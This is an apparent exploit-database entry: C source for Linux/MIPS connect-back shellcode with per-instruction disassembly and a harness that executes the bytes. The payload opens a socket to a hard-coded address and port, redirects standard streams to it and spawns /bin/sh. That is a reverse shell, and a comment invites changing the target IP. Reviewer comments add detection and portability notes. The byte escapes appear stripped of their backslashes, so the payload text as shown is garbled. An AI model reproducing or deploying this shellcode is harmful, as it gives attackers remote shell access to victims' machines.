
# Title : Linux/MIPS - connect back shellcode (port 0x7a69) - 168 bytes.
# Published : 2011-12-10
# Author :
# Previous Title : OSX universal ROP shellcode
# Next Title : Linux x86 egghunt shellcode


/*
 * Title: Linux/MIPS - connect back shellcode (port 0x7a69) - 168 bytes.
 * Author: rigan - imrigan [sobachka] gmail.com
 */

#include <stdio.h>

/*
 * Payload bytes with the author's disassembly alongside.  Read top to
 * bottom, the sequence is: socket() (v0 = 4183), connect() (v0 = 4170) to a
 * sockaddr_in built on the stack with sa_family = 2 (AF_INET), port 0x7a69
 * and address 0xc0a80164 (192.168.1.100), then a dup2() loop (v0 = 4063)
 * that runs a1 from 2 down to 0 so fds 2, 1 and 0 all point at the socket,
 * and finally execve() (v0 = 4011) on the string assembled at -12(sp):
 * 0x2f2f6269 0x6e2f7368 followed by a zero word, i.e. "//bin/sh\0".
 *
 * Detection notes: the destination address and port are hard-coded in the
 * lui/ori pairs marked below, and the same four-byte syscall encoding
 * (x01x01x01x0c, "syscall 0x40404") precedes each of the four system calls.
 * The connect-back target is the obvious network indicator for this sample.
 */
char sc[] =
         "x24x0fxffxfd"        // li      t7,-3
         "x01xe0x20x27"        // nor     a0,t7,zero
         "x01xe0x28x27"        // nor     a1,t7,zero
         "x28x06xffxff"        // slti    a2,zero,-1
         "x24x02x10x57"        // li      v0,4183 ( sys_socket )
         "x01x01x01x0c"        // syscall 0x40404
	 
         "xafxa2xffxff"        // sw      v0,-1(sp)
         "x8fxa4xffxff"        // lw      a0,-1(sp)
         "x24x0fxffxfd"        // li      t7,-3 ( sa_family = AF_INET )
         "x01xe0x78x27"        // nor     t7,t7,zero
         "xafxafxffxe0"        // sw      t7,-32(sp) 
         "x3cx0ex7ax69"        // lui     t6,0x7a69 ( sin_port = 0x7a69 )
         "x35xcex7ax69"        // ori     t6,t6,0x7a69
         "xafxaexffxe4"        // sw      t6,-28(sp)
         
      /* ====================  You can change ip here ;) ====================== */
         "x3cx0dxc0xa8"        // lui     t5,0xc0a8 ( sin_addr = 0xc0a8 ... 
         "x35xadx01x64"        // ori     t5,t5,0x164           ...0164 )
      /* ====================================================================== */
      
         "xafxadxffxe6"        // sw      t5,-26(sp)
         "x23xa5xffxe2"        // addi    a1,sp,-30
         "x24x0cxffxef"        // li      t4,-17 ( addrlen = 16 )     
         "x01x80x30x27"        // nor     a2,t4,zero 
         "x24x02x10x4a"        // li      v0,4170 ( sys_connect ) 
         "x01x01x01x0c"        // syscall 0x40404
	 
         "x24x0fxffxfd"        // li      t7,-3
         "x01xe0x28x27"        // nor     a1,t7,zero
         "x8fxa4xffxff"        // lw      a0,-1(sp)
//dup2_loop:  a1 starts at 2 and is decremented until it reaches -1
         "x24x02x0fxdf"        // li      v0,4063 ( sys_dup2 )
         "x01x01x01x0c"        // syscall 0x40404
         "x20xa5xffxff"        // addi    a1,a1,-1
         "x24x01xffxff"        // li      at,-1
         "x14xa1xffxfb"        // bne     a1,at, dup2_loop
	 
         "x28x06xffxff"        // slti    a2,zero,-1
         "x3cx0fx2fx2f"        // lui     t7,0x2f2f
         "x35xefx62x69"        // ori     t7,t7,0x6269
         "xafxafxffxf4"        // sw      t7,-12(sp)
         "x3cx0ex6ex2f"        // lui     t6,0x6e2f
         "x35xcex73x68"        // ori     t6,t6,0x7368
         "xafxaexffxf8"        // sw      t6,-8(sp)
         "xafxa0xffxfc"        // sw      zero,-4(sp)
         "x27xa4xffxf4"        // addiu   a0,sp,-12
         "x28x05xffxff"        // slti    a1,zero,-1
         "x24x02x0fxab"        // li      v0,4011 ( sys_execve )
         "x01x01x01x0c";       // syscall 0x40404
         
/*
 * Test harness: prints the size of the sc array (sizeof includes the
 * terminating NUL of the string literal) and then jumps into the array.
 *
 * NOTE(review): `void main` is not a standard signature (`int main(void)`);
 * `sizeof` yields a size_t, so `%d` is the wrong conversion (`%zu`); and
 * assigning a char array to a function pointer without a cast is a
 * constraint violation that compilers typically only warn about.  None of
 * this is changed here.
 *
 * The array lives in writable data, so on a system whose data mappings are
 * non-executable the indirect call below faults instead of running it; that
 * dependence on an executable data segment is itself a useful hardening
 * check on the target platform.
 */
void main(void)
{
       
       void(*s)(void);
       printf("size: %dn", sizeof(sc));
       s = sc;     // char * -> function pointer, no cast (see note above)
       s();        // transfers control into the sc bytes
}